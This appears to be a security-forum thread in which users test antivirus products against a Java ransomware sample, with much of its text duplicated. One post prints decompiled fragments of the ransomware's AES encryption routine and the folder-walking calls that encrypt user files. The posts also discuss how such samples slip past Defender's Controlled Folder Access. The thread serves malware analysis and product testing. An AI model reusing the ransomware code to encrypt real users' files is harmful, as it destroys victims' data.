KonradPL
Level 4
- May 1, 2018
- 169
Q&A Is F-Secure sleeping again?
- Thread starter marcopaone
- Start date
- Status
McMcbrad
Level 23
- Oct 16, 2020
- 1,252
It was on and protecting all folders that go there by default:@marcopaone @McMcbrad Thank you both for testing Defender
The ransomware protection of AVG/Avast prevented the encryption of documents/pictures, could Controlled Folder Access of Defender do the same?
- Apr 24, 2016
- 3,241
Thanks, it's disappointing that CFA didn't make any difference.
McMcbrad
Level 23
- Oct 16, 2020
- 1,252
There is something which I highlighted in my Avast review, somewhere as a comment.
Many AVs don't see a java app as a separate program - they see the javaw.exe process which is whitelisted and allow it to do whatever - this is why Java ransomware (as well as all Java malware) is not to be underestimated.
Avast/AVG see *.jar files as individual programs and block them from encrypting/decrypting, accessing browser passwords and sensitive files, as well as accessing the webcam.
Many AVs don't see a java app as a separate program - they see the javaw.exe process which is whitelisted and allow it to do whatever - this is why Java ransomware (as well as all Java malware) is not to be underestimated.
Avast/AVG see *.jar files as individual programs and block them from encrypting/decrypting, accessing browser passwords and sensitive files, as well as accessing the webcam.
McMcbrad
Level 23
- Oct 16, 2020
- 1,252
By request:
McAfee LiveSafe 16.0 R29 (latest) + Shadow Defender Latest + Windows 10 20H2 (latest)
Static Scan detects nothing:
Upon execution, outcome is same like with Windows Defender:
File on desktop dropped and auto-opened
I kissed my screenshots of conversations with hackers via RATs goodbye:
McAfee LiveSafe 16.0 R29 (latest) + Shadow Defender Latest + Windows 10 20H2 (latest)
Static Scan detects nothing:
Upon execution, outcome is same like with Windows Defender:
File on desktop dropped and auto-opened
I kissed my screenshots of conversations with hackers via RATs goodbye:
If this is bypassing CFA it must be using some sort of special technique to encrypt. CFA is very protective and doesn’t have much of a whitelist, it also causes a lot of false positives.
That’s probably part of why DeepGuard was defeated.
It might be worth trying some of the other strong behavior blockers like Kaspersky or Emsisoft.
That’s probably part of why DeepGuard was defeated.
It might be worth trying some of the other strong behavior blockers like Kaspersky or Emsisoft.
McMcbrad
Level 23
- Oct 16, 2020
- 1,252
Nothing too unusual.
Encryption algorithm:
import java.nio.file.Path;
import java.nio.file.SimpleFileVisitor;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
public /* synthetic */ encryptAes() throws NoSuchAlgorithmException, NoSuchPaddingException {
encryptAes encryptAes2;
encryptAes2.keyGenerator = KeyGenerator.getInstance(Main$Open. ((Object) [1], (int)-970469275));
encryptAes2.encrypter = Cipher.getInstance(Main$Open. ((Object) [2], (int)-704451753));
encryptAes2.keyGenerator.init(128);
encryptAes2.key = encryptAes2.keyGenerator.generateKey();
import java.nio.file.SimpleFileVisitor;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
public /* synthetic */ encryptAes() throws NoSuchAlgorithmException, NoSuchPaddingException {
encryptAes encryptAes2;
encryptAes2.keyGenerator = KeyGenerator.getInstance(Main$Open. ((Object) [1], (int)-970469275));
encryptAes2.encrypter = Cipher.getInstance(Main$Open. ((Object) [2], (int)-704451753));
encryptAes2.keyGenerator.init(128);
encryptAes2.key = encryptAes2.keyGenerator.generateKey();
import java.util.HashMap;
encryptAes encryptAes2 = new encryptAes(); <---- instantiates the class with the code above
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [0], (int)-601438172)) + Main$Open. ((Object) [1], (int)-1877012877), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [2], (int)1693082425)) + Main$Open. ((Object) [3], (int)54234075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [4], (int)-557160074)) + Main$Open. ((Object) [5], (int)-135269237), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [6], (int)-504606357)) + Main$Open. ((Object) [7], (int)72707544), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [8], (int)713534176)) + Main$Open. ((Object) [9], (int)-969383075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [10], (int)1242977540)) + Main$Open. ((Object) [11], (int)906653621), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
}
encryptAes encryptAes2 = new encryptAes(); <---- instantiates the class with the code above
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [0], (int)-601438172)) + Main$Open. ((Object) [1], (int)-1877012877), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [2], (int)1693082425)) + Main$Open. ((Object) [3], (int)54234075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [4], (int)-557160074)) + Main$Open. ((Object) [5], (int)-135269237), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [6], (int)-504606357)) + Main$Open. ((Object) [7], (int)72707544), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [8], (int)713534176)) + Main$Open. ((Object) [9], (int)-969383075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [10], (int)1242977540)) + Main$Open. ((Object) [11], (int)906653621), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
}
Last edited:
KonradPL
Level 4
- May 1, 2018
- 169
What about eset? Maybe Eset can do better?
- May 26, 2014
- 1,116
The moral of the story? If you dont need Java, uninstall it ASAP.
- Aug 17, 2014
- 5,835
Useless to ask for ESET, without signatures or cloud detection by ESET, Custom HIPS rules only helps to block such threats unknown to ESET.
- May 26, 2014
- 1,116
McMcbrad
Level 23
- Oct 16, 2020
- 1,252
- May 26, 2014
- 1,116
WiseVector StopX is such a beast, it is everything that Cylance promises to be but doesnt.
Thanks again for testing.
- Jul 14, 2015
- 529
In newspapers they say that 2021 there will be a new wave : Ransomware 2.0
So be careful and stay protected !
So be careful and stay protected !
McMcbrad
Level 23
- Oct 16, 2020
- 1,252
They say things like this every year...in newspapers every year will be the coldest from 30 years onwards, threats will evade all AVs and more...
It won't take long before vendors perfect the detection of the new ransomware as well
How many new threat types have come up in the last few years and they are all well-handled.
- Jul 27, 2015
- 4,174
I'm closing/locking this thread. The main topic has already been answered.
Thanks for the thread @marcopaone
Thanks for the thread @marcopaone
- Status
